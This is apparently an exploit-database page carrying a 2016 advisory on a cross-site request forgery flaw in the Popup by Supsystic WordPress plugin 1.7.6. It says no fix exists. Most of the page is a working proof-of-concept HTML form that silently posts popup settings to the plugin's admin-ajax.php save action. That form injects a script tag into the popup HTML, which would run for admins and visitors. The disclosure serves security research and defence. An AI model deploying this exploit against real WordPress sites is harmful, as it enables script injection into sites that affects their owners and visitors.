header-logo
Suggest Exploit
vendor:
Popup by Supsystic WordPress Plugin
by:
Summer of Pwnage
8,8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Popup by Supsystic WordPress Plugin
Affected Version From: 1.7.6
Affected Version To: 1.7.6
Patch Exists: NO
Related CWE: N/A
CPE: a:supsystic:popup_by_supsystic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2016

Popup by Supsystic WordPress Plugin Vulnerable to Cross-Site Request Forgery

A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin to click a specially crafted link or visit a malicious attacker-controlled webpage.

Mitigation:

There is currently no fix available.
Source

Exploit-DB raw data:

<!--
Source: https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html

Abstract
A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin to click a specially crafted link or visit a malicious attacker-controlled webpage.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160724-0013

Tested versions
This issue was succesfully tested on the Popup by Supsystic WordPress plugin version 1.7.6.

Fix
There is currently no fix available.

Introduction
The aim of the Popup by Supsystic WordPress plugin is to help you get more newsletter subscribers, promote new products, deliver special offers and to get more social followers.

A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated admins or visitors that see the popup generated by this plugin. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).

Details
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
-->

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="params[main][show_on]" value="page_load" />
         <input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
         <input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
         <input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
         <input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
         <input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
         <input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
         <input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
         <input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
         <input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
         <input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
         <input type="hidden" name="params[main][close_on]" value="user_close" />
         <input type="hidden" name="params[main][show_pages]" value="all" />
         <input type="hidden" name="params[main][show_time_from]" value="12:00am" />
         <input type="hidden" name="params[main][show_time_to]" value="12:00am" />
         <input type="hidden" name="params[main][show_date_from]" value="" />
         <input type="hidden" name="params[main][show_date_to]" value="" />
         <input type="hidden" name="params[main][show_to]" value="everyone" />
         <input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
         <input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
         <input type="hidden" name="params[main][count_times_num]" value="1" />
         <input type="hidden" name="params[main][count_times_mes]" value="day" />
         <input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_ips]" value="" />
         <input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
         <input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
         <input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
         <input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
         <input type="hidden" name="params[main][hide_preg_url]" value="" />
         <input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
         <input type="hidden" name="params[tpl][width]" value="400" />
         <input type="hidden" name="params[tpl][width_measure]" value="px" />
         <input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
         <input type="hidden" name="params[tpl][bg_type_0]" value="color" />
         <input type="hidden" name="params[tpl][bg_img_0]" value="" />
         <input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
         <input type="hidden" name="params[tpl][bg_type_1]" value="color" />
         <input type="hidden" name="params[tpl][bg_img_1]" value="" />
         <input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
         <input type="hidden" name="params[tpl][font_label]" value="default" />
         <input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
         <input type="hidden" name="params[tpl][font_txt_0]" value="default" />
         <input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
         <input type="hidden" name="params[tpl][font_footer]" value="default" />
         <input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
         <input type="hidden" name="params[tpl][responsive_mode]" value="def" />
         <input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
         <input type="hidden" name="params[tpl][close_btn]" value="while_close" />
         <input type="hidden" name="params[tpl][bullets]" value="lists_green" />
         <input type="hidden" name="layered_style_promo" value="1" />
         <input type="hidden" name="params[tpl][layered_pos]" value="" />
         <input type="hidden" name="params[tpl][enb_label]" value="1" />
         <input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
         <input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
         <input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
         <input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
         <input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
         <input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
         <input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
         <input type="hidden" name="params[tpl][sm_design]" value="boxy" />
         <input type="hidden" name="params[tpl][anim_key]" value="none" />
         <input type="hidden" name="params[tpl][anim_duration]" value="" />
         <input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
         <input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
         <input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
         <input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
         <input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
         <input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
         <input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
         <input type="hidden" name="test_email" value="canzihazcandy@gmail.com" />
         <input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
         <input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
         <input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
         <input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
         <input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
         <input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
         <input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
         <input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
         <input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
         <input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
         <input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
         <input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
         <input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
         <input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
         <input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
         <input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="admin@mail.com" />
         <input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="admin@mail.com" />
         <input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
         <input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
         <input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
         <input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
         <input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
         <input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
         <input type="hidden" name="stat_from_txt" value="" />
         <input type="hidden" name="stat_to_txt" value="" />
         <input type="hidden" name="css" value="" />
         <input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" />&#10; <script>alert("xss")</script>&#10;<div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell">&#10;   <a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a>&#10;&#10;   <div class="ppsInnerTblContent">&#10;      <div class="ppsPopupListsInner ppsPopupInner">&#10;         [if enb_label]&#10;            <div class="ppsPopupLabel ppsPopupListsLabel">[label]</div>&#10;         [endif]&#10;         <div style="clear: both;"></div>&#10;         [if enb_txt_0]&#10;            <div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0">&#10;            [txt_0]&#10;            </div>&#10;         [endif]&#10;         [if enb_subscribe]&#10;            <div class="ppsSubscribeShell">&#10;               [sub_form_start]&#10;               [sub_fields_html]&#10;               <input type="submit" name="submit" value="[sub_btn_label]" />&#10;               [sub_form_end]&#10;               <div style="clear: both;"></div>&#10;            </div>&#10;         [endif]&#10;         <div style="clear: both;"></div>&#10;         <div class="ppsRightCol">&#10;            [if enb_sm]&#10;               <div style="clear: both;"></div>&#10;               <div class="ppsSm">&#10;               [sm_html]&#10;               </div>&#10;            [endif]&#10;            [if enb_foot_note]&#10;               <div class="ppsFootNote">&#10;               [foot_note]&#10;               </div>&#10;            [endif]&#10;         </div>&#10;      </div>&#10;   </div>&#10;</div>&#10;" />
         <input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
         <input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
         <input type="hidden" name="mod" value="popup" />
         <input type="hidden" name="action" value="save" />
         <input type="hidden" name="id" value="100" />
         <input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
         <input type="hidden" name="pl" value="pps" />
         <input type="hidden" name="reqType" value="ajax" />
         <input type="submit"/>
      </form>
   </body>
</html>

Navigation

Suggest Exploit

Services By CQR